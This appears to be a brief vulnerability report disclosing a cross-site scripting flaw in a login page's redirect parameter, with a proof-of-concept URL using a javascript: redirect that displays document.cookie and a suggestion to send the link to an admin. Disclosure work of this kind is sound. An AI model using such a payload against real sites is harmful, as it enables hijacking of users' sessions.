The endpoint of login allows Javascript payload to execute which leads to XSS pop-up
Send this link to admin http://127.0.0.1:2222/login/?redirect=javascript:alert(document.cookie)
When he will open it and try to login XSS will popup.
https://drive.google.com/file/d/1VoO0BHUE03o0iOo8B9WFRvC1zRrFN4-T/view?usp=sharing